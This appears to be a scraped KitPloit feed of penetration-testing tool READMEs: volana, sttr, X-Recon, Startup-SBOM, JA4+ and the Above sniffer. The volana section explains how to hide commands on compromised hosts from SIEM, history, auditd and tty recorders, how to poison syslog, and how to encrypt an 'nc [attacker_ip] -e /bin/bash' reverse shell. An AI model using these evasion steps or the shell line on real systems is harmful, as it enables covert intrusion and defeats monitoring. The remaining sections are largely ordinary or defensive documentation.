      volana provides a simple way to hide commands executed on a compromised machine by providing its own shell runtime (enter your command, volana executes it for you). This way you clear your tracks DURING your passage.


      Usage

      You need to get an interactive shell. (Find a way to spawn it, you are a hacker, it's your job!) Then download volana on the target machine and launch it. That's it: now you can type the commands you want to be stealthily executed.

      ## Download it from github release
      ## If you do not have internet access from compromised machine, find another way
      curl -lO -L https://github.com/ariary/volana/releases/latest/download/volana

      ## Execute it
      ./volana

      ## You are now under the radar
      volana Β» echo "Hi SIEM team! Do you find me?" > /dev/null 2>&1 #you are allowed to be a bit cocky
      volana Β» [command]

      Keywords for the volana console:
      • ring: enable ring mode, i.e. each command is launched along with plenty of others to cover tracks (against solutions that monitor system calls)
      • exit: exit the volana console

      from non interactive shell

      Imagine you have a non-interactive shell (webshell or blind RCE); you could use the encrypt and decrypt subcommands. Beforehand, you need to build volana with an embedded encryption key.

      On attacker machine

      ## Build volana with encryption key
      make build.volana-with-encryption

      ## Transfer it on TARGET (the unique detectable command)
      ## [...]

      ## Encrypt the command you want to stealthy execute
      ## (Here a nc bindshell to obtain a interactive shell)
      volana encr "nc [attacker_ip] [attacker_port] -e /bin/bash"
      >>> ENCRYPTED COMMAND

      Copy the encrypted command and execute it with your RCE on the target machine

      ./volana decr [encrypted_command]
      ## Now you have a bindshell; spawn it to make it interactive and use volana as usual to stay stealthy (./volana). Don't forget to remove the volana binary before leaving (the decryption key can easily be retrieved from it).

Why not just hide the command with echo [command] | base64 and decode it on the target with echo [encoded_command] | base64 -d | bash?

Because we want to be protected against systems that trigger an alert on base64 usage or that look for base64 text in commands. We also want to make investigation difficult, and base64 is not a real barrier.
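
For illustration, here is a minimal Python sketch of the difference (a hypothetical scheme, NOT volana's actual implementation): plain base64 is reversible by anyone, while the keyed variant is useless without the key baked in at build time.

```python
# Hypothetical sketch, not volana's real scheme: contrast plain base64 with a
# transform keyed on a build-time secret. `base64 -d` recovers the former
# instantly; the latter stays opaque without the embedded key.
import base64
from itertools import cycle

EMBEDDED_KEY = b"compile-time-secret"  # hypothetical key embedded at build time

def encr(cmd: str) -> str:
    xored = bytes(b ^ k for b, k in zip(cmd.encode(), cycle(EMBEDDED_KEY)))
    return base64.b64encode(xored).decode()

def decr(blob: str) -> str:
    raw = base64.b64decode(blob)
    return bytes(b ^ k for b, k in zip(raw, cycle(EMBEDDED_KEY))).decode()

print(decr(encr("nc 10.0.0.1 4444 -e /bin/bash")))  # round-trips to the command
```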

      Detection

Keep in mind that volana is not a miracle that will make you totally invisible. Its aim is to make intrusion detection and investigation harder.

By "detected" we mean being able to trigger an alert when a certain command has been executed.

      Hide from

Only the command line that launches volana will be caught. 🧠 However, if you prefix it with a space, the default bash behavior is to not save it in history.

      • Detection systems that are based on history command output
      • Detection systems that are based on history files
      • .bash_history, ".zsh_history" etc ..
      • Detection systems that are based on bash debug traps
      • Detection systems that are based on sudo built-in logging system
      • Detection systems tracing all processes syscall system-wide (eg opensnoop)
      • Terminal (tty) recorder (script, screen -L, sexonthebash, ovh-ttyrec, etc..)
      • Easy to detect & avoid: pkill -9 script
      • Not a common case
      • screen is a bit more difficult to avoid, however it does not register input (secret input: stty -echo => avoid)
      • Command detection Could be avoid with volana with encryption

      Visible for

      • Detection systems that have alert for unknown command (volana one)
      • Detection systems that are based on keylogger
      • Easy to avoid: copy/past commands
      • Not a common case
      • Detection systems that are based on syslog files (e.g. /var/log/auth.log)
      • Only for sudo or su commands
      • syslog file could be modified and thus be poisoned as you wish (e.g for /var/log/auth.log:logger -p auth.info "No hacker is poisoning your syslog solution, don't worry")
      • Detection systems that are based on syscall (eg auditd,LKML/eBPF)
      • Difficult to analyze, could be make unreadable by making several diversion syscalls
      • Custom LD_PRELOAD injection to make log
      • Not a common case at all

      Bug bounty

Sorry for the clickbait title, but no money will be provided to contributors. πŸ›

Let me know if you have found:
β€’ a way to detect volana
β€’ a way to spy on a console that doesn't detect volana commands
β€’ a way to avoid a detection system

      Report here

      Credit



      ☐ β˜† βœ‡ KitPloit - PenTest Tools!

      Sttr - Cross-Platform, Cli App To Perform Various Operations On String

      By: Unknown β€” June 8th 2024 at 12:30


sttr is a command-line tool that allows you to quickly run various transformation operations on strings.


      // With input prompt
      sttr

      // Direct input
      sttr md5 "Hello World"

      // File input
      sttr md5 file.text
      sttr base64-encode image.jpg

// Reading from other processes like cat, curl, printf, etc.
      echo "Hello World" | sttr md5
      cat file.txt | sttr md5

      // Writing output to a file
      sttr yaml-json file.yaml > file-output.json

      :movie_camera: Demo

      :battery: Installation

      Quick install

You can run the curl command below to install it somewhere in your PATH for easy use. Ideally, it will be installed in the ./bin folder.

      curl -sfL https://raw.githubusercontent.com/abhimanyu003/sttr/main/install.sh | sh

      Webi

macOS / Linux

      curl -sS https://webi.sh/sttr | sh

      Windows

      curl.exe https://webi.ms/sttr | powershell

      See here

      Homebrew

      If you are on macOS and using Homebrew, you can install sttr with the following:

      brew tap abhimanyu003/sttr
      brew install sttr

      Snap

      sudo snap install sttr

      Arch Linux

      yay -S sttr-bin

      Scoop

      scoop bucket add sttr https://github.com/abhimanyu003/scoop-bucket.git
      scoop install sttr

      Go

      go install github.com/abhimanyu003/sttr@latest

      Manually

Download the pre-compiled binaries from the Releases page and copy them to the desired location.

      :books: Guide

      • After installation simply run sttr command.
      // For interactive menu
      sttr
      // Provide your input
      // Press two enter to open operation menu
      // Press `/` to filter various operations.
      // Can also press UP-Down arrows select various operations.
      • Working with help.
      sttr -h

      // Example
      sttr zeropad -h
      sttr md5 -h
      • Working with files input.
      sttr {command-name} {filename}

      sttr base64-encode image.jpg
      sttr md5 file.txt
      sttr md-html Readme.md
      • Writing output to file.
      sttr yaml-json file.yaml > file-output.json
      • Taking input from other command.
      curl https: //jsonplaceholder.typicode.com/users | sttr json-yaml
      • Chaining the different processor.
      sttr md5 hello | sttr base64-encode

      echo "Hello World" | sttr base64-encode | sttr md5
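
For reference, here is what the first chained pipeline (sttr md5 hello | sttr base64-encode) computes, sketched in Python. This only illustrates the chaining semantics, not sttr's Go implementation, and exact output may differ depending on trailing-newline handling:

```python
# Python equivalent of: sttr md5 hello | sttr base64-encode
# (an illustration of processor chaining, not sttr's code)
import base64
import hashlib

md5_hex = hashlib.md5(b"hello").hexdigest()         # first processor: md5
print(base64.b64encode(md5_hex.encode()).decode())  # second: base64-encode
```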

      :boom: Supported Operations

      Encode/Decode

      • [x] ascii85-encode - Encode your text to ascii85
      • [x] ascii85-decode - Decode your ascii85 text
      • [x] base32-decode - Decode your base32 text
      • [x] base32-encode - Encode your text to base32
      • [x] base64-decode - Decode your base64 text
      • [x] base64-encode - Encode your text to base64
      • [x] base85-encode - Encode your text to base85
      • [x] base85-decode - Decode your base85 text
      • [x] base64url-decode - Decode your base64 url
      • [x] base64url-encode - Encode your text to url
      • [x] html-decode - Unescape your HTML
      • [x] html-encode - Escape your HTML
      • [x] rot13-encode - Encode your text to ROT13
      • [x] url-decode - Decode URL entities
      • [x] url-encode - Encode URL entities

      Hash

      • [x] bcrypt - Get the Bcrypt hash of your text
      • [x] md5 - Get the MD5 checksum of your text
      • [x] sha1 - Get the SHA1 checksum of your text
      • [x] sha256 - Get the SHA256 checksum of your text
      • [x] sha512 - Get the SHA512 checksum of your text

      String

      • [x] camel - Transform your text to CamelCase
      • [x] kebab - Transform your text to kebab-case
      • [x] lower - Transform your text to lower case
      • [x] reverse - Reverse Text ( txeT esreveR )
      • [x] slug - Transform your text to slug-case
      • [x] snake - Transform your text to snake_case
      • [x] title - Transform your text to Title Case
      • [x] upper - Transform your text to UPPER CASE

      Lines

      • [x] count-lines - Count the number of lines in your text
      • [x] reverse-lines - Reverse lines
      • [x] shuffle-lines - Shuffle lines randomly
      • [x] sort-lines - Sort lines alphabetically
      • [x] unique-lines - Get unique lines from list

      Spaces

      • [x] remove-spaces - Remove all spaces + new lines
      • [x] remove-newlines - Remove all new lines

      Count

      • [x] count-chars - Find the length of your text (including spaces)
      • [x] count-lines - Count the number of lines in your text
      • [x] count-words - Count the number of words in your text

      RGB/Hex

      • [x] hex-rgb - Convert a #hex-color code to RGB
      • [x] hex-encode - Encode your text Hex
      • [x] hex-decode - Convert Hexadecimal to String

      JSON

      • [x] json - Format your text as JSON
      • [x] json-escape - JSON Escape
      • [x] json-unescape - JSON Unescape
      • [x] json-yaml - Convert JSON to YAML text
      • [x] json-msgpack - Convert JSON to MSGPACK
      • [x] msgpack-json - Convert MSGPACK to JSON

      YAML

      • [x] yaml-json - Convert YAML to JSON text

      Markdown

      • [x] markdown-html - Convert Markdown to HTML

      Extract

      • [x] extract-emails - Extract emails from given text
      • [x] extract-ip - Extract IPv4 and IPv6 from your text
      • [x] extract-urls - Extract URls your text ( we don't do ping check )

      Other

      • [x] escape-quotes - escape single and double quotes from your text
      • [x] completion - generate the autocompletion script for the specified shell
      • [x] interactive - Use sttr in interactive mode
      • [x] version - Print the version of sttr
      • [x] zeropad - Pad a number with zeros
      • [x] and adding more....

      Featured On

These are a few locations where sttr was highlighted; many thanks to all of you. Please feel free to add any blogs/videos you have made that discuss sttr to the list.



      ☐ β˜† βœ‡ KitPloit - PenTest Tools!

      X-Recon - A Utility For Detecting Webpage Inputs And Conducting XSS Scans

      By: Zion3R β€” June 5th 2024 at 12:30

      A utility for identifying web page inputs and conducting XSS scanning.


      Features:

      • Subdomain Discovery:
      • Retrieves relevant subdomains for the target website and consolidates them into a whitelist. These subdomains can be utilized during the scraping process.

      • Site-wide Link Discovery:

      • Collects all links throughout the website based on the provided whitelist and the specified max_depth.

      • Form and Input Extraction:

      • Identifies all forms and inputs found within the extracted links, generating a JSON output. This JSON output serves as a foundation for leveraging the XSS scanning capability of the tool.

      • XSS Scanning:

      • Once the start recon option returns a custom JSON containing the extracted entries, the X-Recon tool can initiate the XSS vulnerability testing process and furnish you with the desired results!



      Note:

The scanning functionality is currently inactive on SPA (Single Page Application) web applications; we have only tested it on websites developed with PHP, yielding remarkable results. In the future, we plan to incorporate SPA support into the tool.




      Note:

This tool maintains an up-to-date list of file extensions that it skips during the exploration process. The default list includes common file types such as images, stylesheets, and scripts (".css", ".js", ".mp4", ".zip", ".png", ".svg", ".jpeg", ".webp", ".jpg", ".gif"). You can customize this list to better suit your needs by editing the setting.json file.
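
As a sketch of how such a skip list behaves during crawling (hypothetical code, not X-Recon's actual implementation):

```python
# Hypothetical illustration of the extension skip list from setting.json:
# URLs ending in a skipped extension are never queued for exploration.
SKIP_EXTS = (".css", ".js", ".mp4", ".zip", ".png",
             ".svg", ".jpeg", ".webp", ".jpg", ".gif")

def should_explore(url: str) -> bool:
    path = url.lower().split("?", 1)[0]   # ignore query strings
    return not path.endswith(SKIP_EXTS)

print(should_explore("http://testphp.vulnweb.com/login.php"))  # True
print(should_explore("http://testphp.vulnweb.com/logo.png"))   # False
```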

      Installation

      $ git clone https://github.com/joshkar/X-Recon
      $ cd X-Recon
      $ python3 -m pip install -r requirements.txt
      $ python3 xr.py

      Target For Test:

      You can use this address in the Get URL section

        http://testphp.vulnweb.com


      ☐ β˜† βœ‡ KitPloit - PenTest Tools!

      Startup-SBOM - A Tool To Reverse Engineer And Inspect The RPM And APT Databases To List All The Packages Along With Executables, Service And Versions

      By: Zion3R β€” June 3rd 2024 at 12:30


This is a simple SBOM utility which aims to provide an insider view of which packages are getting executed.

The process and objective are simple: get a clear perspective on the packages installed by APT (support for RPM and other package managers is in progress). This is mainly needed to check which packages are actually being executed.


      Installation

      The packages needed are mentioned in the requirements.txt file and can be installed using pip:

      pip3 install -r requirements.txt

      Usage

      • First of all install the packages.
      • Secondly , you need to set up environment variables such as:
        • Mount the image: Currently I am still working on a mechanism to automatically define a mount point and mount different types of images and volumes but its still quite a task for me.
      • Finally run the tool to list all the packages.
| Argument | Description |
|---|---|
| --analysis-mode | Specifies the mode of operation. Default is static. Choices are static and chroot. |
| --static-type | Specifies the type of analysis for static mode. Required for static mode only. Choices are info and service. |
| --volume-path | Specifies the path to the mounted volume. Default is /mnt. |
| --save-file | Specifies the output file for JSON output. |
| --info-graphic | Specifies whether to generate visual plots for CHROOT analysis. Default is True. |
| --pkg-mgr | Manually specify the package manager, or omit this option for automatic detection. |
APT:

β€’ Static Info Analysis (a Python sketch of this idea follows the examples below):
  β€’ This command runs the program in static analysis mode, specifically using the Info Directory analysis method.
  β€’ It analyzes the packages installed on the mounted volume located at /mnt.
  β€’ It saves the output in a JSON file named output.json.
  β€’ It generates visual plots for CHROOT analysis.
```bash
python3 main.py --pkg-mgr apt --analysis-mode static --static-type info --volume-path /mnt --save-file output.json
```
      • Static Service Analysis:

      • This command runs the program in static analysis mode, specifically using the Service file analysis method.

      • It analyzes the packages installed on the mounted volume located at /custom_mount.
      • It saves the output in a JSON file named output.json.
      • It does not generate visual plots for CHROOT analysis. bash python3 main.py --pkg-mgr apt --analysis-mode static --static-type service --volume-path /custom_mount --save-file output.json --info-graphic False

      • Chroot analysis with or without Graphic output:

      • This command runs the program in chroot analysis mode.
      • It analyzes the packages installed on the mounted volume located at /mnt.
      • It saves the output in a JSON file named output.json.
      • It generates visual plots for CHROOT analysis.
      • For graphical output keep --info-graphic as True else False bash python3 main.py --pkg-mgr apt --analysis-mode chroot --volume-path /mnt --save-file output.json --info-graphic True/False

RPM:

β€’ Static Analysis:
  β€’ Similar to how it's done on APT, but only one type of static scan is available for now.
```bash
python3 main.py --pkg-mgr rpm --analysis-mode static --volume-path /mnt --save-file output.json
```

      • Chroot analysis with or without Graphic output:
      • Exactly how its done on apt. bash python3 main.py --pkg-mgr rpm --analysis-mode chroot --volume-path /mnt --save-file output.json --info-graphic True/False

      Supporting Images

Currently the tool works on Debian and Red Hat based images. I can guarantee the Debian outputs, but the Red Hat ones still need work; they are not perfect.

I am working on the pacman side of things, trying to find a reliable way of accessing the pacman db for static analysis.

      Graphical Output Images (Chroot)

      APT Chroot

      RPM Chroot

      Inner Workings

      For the workings and process related documentation please read the wiki page: Link

      TODO

      • [x] Support for RPM
      • [x] Support for APT
      • [x] Support for Chroot Analysis
      • [x] Support for Versions
      • [x] Support for Chroot Graphical output
      • [x] Support for organized graphical output
      • [ ] Support for Pacman

      Ideas and Discussions

      Ideas regarding this topic are welcome in the discussions page.



      ☐ β˜† βœ‡ KitPloit - PenTest Tools!

      JA4+ - Suite Of Network Fingerprinting Standards

      By: Zion3R β€” May 25th 2024 at 12:30


JA4+ is a suite of network fingerprinting methods that are easy to use and easy to share. These methods are both human and machine readable to facilitate more effective threat-hunting and analysis. The use-cases for these fingerprints include scanning for threat actors, malware detection, session hijacking prevention, compliance automation, location tracking, DDoS detection, grouping of threat actors, reverse shell detection, and many more.

      Please read our blogs for details on how JA4+ works, why it works, and examples of what can be detected/prevented with it:
      JA4+ Network Fingerprinting (JA4/S/H/L/X/SSH)
      JA4T: TCP Fingerprinting (JA4T/TS/TScan)


      To understand how to read JA4+ fingerprints, see Technical Details

This repo includes JA4+ in Python, Rust, Zeek and C, as a Wireshark plugin.

      JA4/JA4+ support is being added to:
      GreyNoise
      Hunt
      Driftnet
      DarkSail
      Arkime
      GoLang (JA4X)
      Suricata
      Wireshark
      Zeek
      nzyme
      Netresec's CapLoader
Netresec's NetworkMiner
      NGINX
      F5 BIG-IP
      nfdump
      ntop's ntopng
      ntop's nDPI
      Team Cymru
      NetQuest
      Censys
      Exploit.org's Netryx
Cloudflare
      fastly
      with more to be announced...

      Examples

      Application JA4+ Fingerprints
      Chrome JA4=t13d1516h2_8daaf6152771_02713d6af862 (TCP)
      JA4=q13d0312h3_55b375c5d22e_06cda9e17597 (QUIC)
      JA4=t13d1517h2_8daaf6152771_b0da82dd1658 (pre-shared key)
      JA4=t13d1517h2_8daaf6152771_b1ff8ab2d16f (no key)
      IcedID Malware Dropper JA4H=ge11cn020000_9ed1ff1f7b03_cd8dafe26982
      IcedID Malware JA4=t13d201100_2b729b4bf6f3_9e7b989ebec8
      JA4S=t120300_c030_5e2616a54c73
      Sliver Malware JA4=t13d190900_9dc949149365_97f8aa674fd9
      JA4S=t130200_1301_a56c5b993250
      JA4X=000000000000_4f24da86fad6_bf0f0589fc03
      JA4X=000000000000_7c32fa18c13e_bf0f0589fc03
      Cobalt Strike JA4H=ge11cn060000_4e59edc1297a_4da5efaf0cbd
      JA4X=2166164053c1_2166164053c1_30d204a01551
      SoftEther VPN JA4=t13d880900_fcb5b95cb75a_b0d3b4ac2a14 (client)
      JA4S=t130200_1302_a56c5b993250
      JA4X=d55f458d5a6c_d55f458d5a6c_0fc8c171b6ae
      Qakbot JA4X=2bab15409345_af684594efb4_000000000000
      Pikabot JA4X=1a59268f55e5_1a59268f55e5_795797892f9c
      Darkgate JA4H=po10nn060000_cdb958d032b0
      LummaC2 JA4H=po11nn050000_d253db9d024b
      Evilginx JA4=t13d191000_9dc949149365_e7c285222651
      Reverse SSH Shell JA4SSH=c76s76_c71s59_c0s70
      Windows 10 JA4T=64240_2-1-3-1-1-4_1460_8
      Epson Printer JA4TScan=28960_2-4-8-1-3_1460_3_1-4-8-16

      For more, see ja4plus-mapping.csv
      The mapping file is unlicensed and free to use. Feel free to do a pull request with any JA4+ data you find.

      Plugins

      Wireshark
      Zeek
      Arkime

      Binaries

      Recommended to have tshark version 4.0.6 or later for full functionality. See: https://pkgs.org/search/?q=tshark

      Download the latest JA4 binaries from: Releases.

      JA4+ on Ubuntu

      sudo apt install tshark
      ./ja4 [options] [pcap]

      JA4+ on Mac

1) Install Wireshark from https://www.wireshark.org/download.html, which will install tshark
2) Add tshark to $PATH

      ln -s /Applications/Wireshark.app/Contents/MacOS/tshark /usr/local/bin/tshark
      ./ja4 [options] [pcap]

      JA4+ on Windows

1) Install Wireshark for Windows from https://www.wireshark.org/download.html which will install tshark.exe
tshark.exe is at the location where Wireshark is installed, for example: C:\Program Files\Wireshark\tshark.exe
2) Add the location of tshark to your "PATH" environment variable in Windows.
(System properties > Environment Variables... > Edit Path)
3) Open cmd and navigate to the ja4 folder

      ja4 [options] [pcap]

      Database

      An official JA4+ database of fingerprints, associated applications and recommended detection logic is in the process of being built.

      In the meantime, see ja4plus-mapping.csv

      Feel free to do a pull request with any JA4+ data you find.

      JA4+ Details

      JA4+ is a set of simple yet powerful network fingerprints for multiple protocols that are both human and machine readable, facilitating improved threat-hunting and security analysis. If you are unfamiliar with network fingerprinting, I encourage you to read my blogs releasing JA3 here, JARM here, and this excellent blog by Fastly on the State of TLS Fingerprinting which outlines the history of the aforementioned along with their problems. JA4+ brings dedicated support, keeping the methods up-to-date as the industry changes.

      All JA4+ fingerprints have an a_b_c format, delimiting the different sections that make up the fingerprint. This allows for hunting and detection utilizing just ab or ac or c only. If one wanted to just do analysis on incoming cookies into their app, they would look at JA4H_c only. This new locality-preserving format facilitates deeper and richer analysis while remaining simple, easy to use, and allowing for extensibility.

      For example; GreyNoise is an internet listener that identifies internet scanners and is implementing JA4+ into their product. They have an actor who scans the internet with a constantly changing single TLS cipher. This generates a massive amount of completely different JA3 fingerprints but with JA4, only the b part of the JA4 fingerprint changes, parts a and c remain the same. As such, GreyNoise can track the actor by looking at the JA4_ac fingerprint (joining a+c, dropping b).
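
As a concrete illustration of the a_b_c format, here is a tiny hypothetical helper (not part of the JA4+ tooling) that joins a+c and drops b, as in the GreyNoise example:

```python
# Minimal sketch: split a JA4 fingerprint at its a_b_c delimiters and build the
# JA4_ac variant (join a+c, drop b) used to track an actor with rotating ciphers.
def ja4_ac(fingerprint: str) -> str:
    a, b, c = fingerprint.split("_")  # locality-preserving a_b_c sections
    return f"{a}_{c}"

# Chrome example fingerprint from the examples above
print(ja4_ac("t13d1516h2_8daaf6152771_02713d6af862"))  # t13d1516h2_02713d6af862
```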

Current methods and implementation details:

| Full Name | Short Name | Description |
|---|---|---|
| JA4 | JA4 | TLS Client Fingerprinting |
| JA4Server | JA4S | TLS Server Response / Session Fingerprinting |
| JA4HTTP | JA4H | HTTP Client Fingerprinting |
| JA4Latency | JA4L | Latency Measurement / Light Distance |
| JA4X509 | JA4X | X509 TLS Certificate Fingerprinting |
| JA4SSH | JA4SSH | SSH Traffic Fingerprinting |
| JA4TCP | JA4T | TCP Client Fingerprinting |
| JA4TCPServer | JA4TS | TCP Server Response Fingerprinting |
| JA4TCPScan | JA4TScan | Active TCP Fingerprint Scanner |

      The full name or short name can be used interchangeably. Additional JA4+ methods are in the works...

      To understand how to read JA4+ fingerprints, see Technical Details

      Licensing

      JA4: TLS Client Fingerprinting is open-source, BSD 3-Clause, same as JA3. FoxIO does not have patent claims and is not planning to pursue patent coverage for JA4 TLS Client Fingerprinting. This allows any company or tool currently utilizing JA3 to immediately upgrade to JA4 without delay.

      JA4S, JA4L, JA4H, JA4X, JA4SSH, JA4T, JA4TScan and all future additions, (collectively referred to as JA4+) are licensed under the FoxIO License 1.1. This license is permissive for most use cases, including for academic and internal business purposes, but is not permissive for monetization. If, for example, a company would like to use JA4+ internally to help secure their own company, that is permitted. If, for example, a vendor would like to sell JA4+ fingerprinting as part of their product offering, they would need to request an OEM license from us.

      All JA4+ methods are patent pending.
      JA4+ is a trademark of FoxIO

      JA4+ can and is being implemented into open source tools, see the License FAQ for details.

      This licensing allows us to provide JA4+ to the world in a way that is open and immediately usable, but also provides us with a way to fund continued support, research into new methods, and the development of the upcoming JA4 Database. We want everyone to have the ability to utilize JA4+ and are happy to work with vendors and open source projects to help make that happen.

      ja4plus-mapping.csv is not included in the above software licenses and is thereby a license-free file.

      Q&A

      Q: Why are you sorting the ciphers? Doesn't the ordering matter?
A: It does, but in our research we've found that applications and libraries choose a unique cipher list more often than a unique ordering. Sorting also reduces the effectiveness of "cipher stunting," a tactic of randomizing cipher ordering to prevent JA3 detection.
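
The effect of sorting can be shown in two lines (a hypothetical illustration; the hex values are arbitrary, not a real cipher list):

```python
# Why sorting defeats cipher stunting: two hellos offering the same ciphers in
# different (randomized) orders collapse to the same sorted list.
stunted_hello_1 = ["c030", "1301", "1302"]   # arbitrary example cipher hexes
stunted_hello_2 = ["1302", "c030", "1301"]   # same set, shuffled order
assert sorted(stunted_hello_1) == sorted(stunted_hello_2)
```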

      Q: Why are you sorting the extensions?
      A: Earlier in 2023, Google updated Chromium browsers to randomize their extension ordering. Much like cipher stunting, this was a tactic to prevent JA3 detection and "make the TLS ecosystem more robust to changes." Google was worried server implementers would assume the Chrome fingerprint would never change and end up building logic around it, which would cause issues whenever Google went to update Chrome.

      So I want to make this clear: JA4 fingerprints will change as application TLS libraries are updated, about once a year. Do not assume fingerprints will remain constant in an environment where applications are updated. In any case, sorting the extensions gets around this and adding in Signature Algorithms preserves uniqueness.

      Q: Doesn't TLS 1.3 make fingerprinting TLS clients harder?
      A: No, it makes it easier! Since TLS 1.3, clients have had a much larger set of extensions and even though TLS1.3 only supports a few ciphers, browsers and applications still support many more.

      JA4+ was created by:

      John Althouse, with feedback from:

      Josh Atkins
      Jeff Atkinson
      Joshua Alexander
      W.
      Joe Martin
      Ben Higgins
      Andrew Morris
      Chris Ueland
      Ben Schofield
      Matthias Vallentin
      Valeriy Vorotyntsev
      Timothy Noel
      Gary Lipsky
      And engineers working at GreyNoise, Hunt, Google, ExtraHop, F5, Driftnet and others.

      Contact John Althouse at john@foxio.io for licensing and questions.

      Copyright (c) 2024, FoxIO



      ☐ β˜† βœ‡ KitPloit - PenTest Tools!

      Above - Invisible Network Protocol Sniffer

      By: Zion3R β€” May 22nd 2024 at 12:30


      Invisible protocol sniffer for finding vulnerabilities in the network. Designed for pentesters and security engineers.


      Above: Invisible network protocol sniffer
      Designed for pentesters and security engineers

      Author: Magama Bazarov, <caster@exploit.org>
      Pseudonym: Caster
      Version: 2.6
      Codename: Introvert

      Disclaimer

      All information contained in this repository is provided for educational and research purposes only. The author is not responsible for any illegal use of this tool.

      It is a specialized network security tool that helps both pentesters and security professionals.

      Mechanics

Above is an invisible network sniffer for finding vulnerabilities in network equipment. It is based entirely on network traffic analysis, so it does not make any noise on the air. It's invisible. The tool is completely based on the Scapy library.

Above allows pentesters to automate the process of finding vulnerabilities in network hardware: discovery protocols, dynamic routing, 802.1Q, ICS protocols, FHRP, STP, LLMNR/NBT-NS, etc.

      Supported protocols

      Detects up to 27 protocols:

      MACSec (802.1X AE)
      EAPOL (Checking 802.1X versions)
      ARP (Passive ARP, Host Discovery)
      CDP (Cisco Discovery Protocol)
      DTP (Dynamic Trunking Protocol)
      LLDP (Link Layer Discovery Protocol)
      802.1Q Tags (VLAN)
      S7COMM (Siemens)
      OMRON
      TACACS+ (Terminal Access Controller Access Control System Plus)
      ModbusTCP
      STP (Spanning Tree Protocol)
      OSPF (Open Shortest Path First)
      EIGRP (Enhanced Interior Gateway Routing Protocol)
      BGP (Border Gateway Protocol)
      VRRP (Virtual Router Redundancy Protocol)
HSRP (Hot Standby Router Protocol)
      GLBP (Gateway Load Balancing Protocol)
      IGMP (Internet Group Management Protocol)
      LLMNR (Link Local Multicast Name Resolution)
      NBT-NS (NetBIOS Name Service)
      MDNS (Multicast DNS)
      DHCP (Dynamic Host Configuration Protocol)
      DHCPv6 (Dynamic Host Configuration Protocol v6)
      ICMPv6 (Internet Control Message Protocol v6)
      SSDP (Simple Service Discovery Protocol)
      MNDP (MikroTik Neighbor Discovery Protocol)

      Operating Mechanism

      Above works in two modes:

      • Hot mode: Sniffing on your interface specifying a timer
      • Cold mode: Analyzing traffic dumps

      The tool is very simple in its operation and is driven by arguments:

      • Interface: Specifying the network interface on which sniffing will be performed
      • Timer: Time during which traffic analysis will be performed
      • Input: The tool takes an already prepared .pcap as input and looks for protocols in it
      • Output: Above will record the listened traffic to .pcap file, its name you specify yourself
      • Passive ARP: Detecting hosts in a segment using Passive ARP
      usage: above.py [-h] [--interface INTERFACE] [--timer TIMER] [--output OUTPUT] [--input INPUT] [--passive-arp]

      options:
      -h, --help show this help message and exit
      --interface INTERFACE
      Interface for traffic listening
      --timer TIMER Time in seconds to capture packets, if not set capture runs indefinitely
      --output OUTPUT File name where the traffic will be recorded
      --input INPUT File name of the traffic dump
      --passive-arp Passive ARP (Host Discovery)

      Information about protocols

The information obtained will be useful not only to the pentester but also to the security engineer: it tells them what they need to pay attention to.

      When Above detects a protocol, it outputs the necessary information to indicate the attack vector or security issue:

      • Impact: What kind of attack can be performed on this protocol;

      • Tools: What tool can be used to launch an attack;

      • Technical information: Required information for the pentester, sender MAC/IP addresses, FHRP group IDs, OSPF/EIGRP domains, etc.

      • Mitigation: Recommendations for fixing the security problems

      • Source/Destination Addresses: For protocols, Above displays information about the source and destination MAC addresses and IP addresses


      Installation

      Linux

      You can install Above directly from the Kali Linux repositories

      caster@kali:~$ sudo apt update && sudo apt install above

      Or...

      caster@kali:~$ sudo apt-get install python3-scapy python3-colorama python3-setuptools
      caster@kali:~$ git clone https://github.com/casterbyte/Above
      caster@kali:~$ cd Above/
      caster@kali:~/Above$ sudo python3 setup.py install

      macOS:

      # Install python3 first
      brew install python3
      # Then install required dependencies
      sudo pip3 install scapy colorama setuptools

      # Clone the repo
      git clone https://github.com/casterbyte/Above
      cd Above/
      sudo python3 setup.py install

      Don't forget to deactivate your firewall on macOS!

      Settings > Network > Firewall


      How to Use

      Hot mode

      Above requires root access for sniffing

      Above can be run with or without a timer:

      caster@kali:~$ sudo above --interface eth0 --timer 120

To stop traffic sniffing, press CTRL + C

WARNING! Above is not designed to work with tunnel interfaces (L3) due to the use of filters for L2 protocols. The tool may not work properly on tunneled L3 interfaces.

      Example:

      caster@kali:~$ sudo above --interface eth0 --timer 120

      -----------------------------------------------------------------------------------------
      [+] Start sniffing...

      [*] After the protocol is detected - all necessary information about it will be displayed
      --------------------------------------------------
      [+] Detected SSDP Packet
      [*] Attack Impact: Potential for UPnP Device Exploitation
      [*] Tools: evil-ssdp
      [*] SSDP Source IP: 192.168.0.251
      [*] SSDP Source MAC: 02:10:de:64:f2:34
      [*] Mitigation: Ensure UPnP is disabled on all devices unless absolutely necessary, monitor UPnP traffic
      --------------------------------------------------
      [+] Detected MDNS Packet
      [*] Attack Impact: MDNS Spoofing, Credentials Interception
      [*] Tools: Responder
      [*] MDNS Spoofing works specifically against Windows machines
      [*] You cannot get NetNTLMv2-SSP from Apple devices
      [*] MDNS Speaker IP: fe80::183f:301c:27bd:543
      [*] MDNS Speaker MAC: 02:10:de:64:f2:34
      [*] Mitigation: Filter MDNS traffic. Be careful with MDNS filtering
      --------------------------------------------------

      If you need to record the sniffed traffic, use the --output argument

      caster@kali:~$ sudo above --interface eth0 --timer 120 --output above.pcap

      If you interrupt the tool with CTRL+C, the traffic is still written to the file

      Cold mode

      If you already have some recorded traffic, you can use the --input argument to look for potential security issues

      caster@kali:~$ above --input ospf-md5.cap

      Example:

      caster@kali:~$ sudo above --input ospf-md5.cap

      [+] Analyzing pcap file...

      --------------------------------------------------
      [+] Detected OSPF Packet
      [+] Attack Impact: Subnets Discovery, Blackhole, Evil Twin
      [*] Tools: Loki, Scapy, FRRouting
      [*] OSPF Area ID: 0.0.0.0
      [*] OSPF Neighbor IP: 10.0.0.1
      [*] OSPF Neighbor MAC: 00:0c:29:dd:4c:54
      [!] Authentication: MD5
      [*] Tools for bruteforce: Ettercap, John the Ripper
      [*] OSPF Key ID: 1
      [*] Mitigation: Enable passive interfaces, use authentication
      --------------------------------------------------
      [+] Detected OSPF Packet
      [+] Attack Impact: Subnets Discovery, Blackhole, Evil Twin
      [*] Tools: Loki, Scapy, FRRouting
      [*] OSPF Area ID: 0.0.0.0
      [*] OSPF Neighbor IP: 192.168.0.2
      [*] OSPF Neighbor MAC: 00:0c:29:43:7b:fb
      [!] Authentication: MD5
      [*] Tools for bruteforce: Ettercap, John the Ripper
      [*] OSPF Key ID: 1
      [*] Mitigation: Enable passive interfaces, use authentication

      Passive ARP

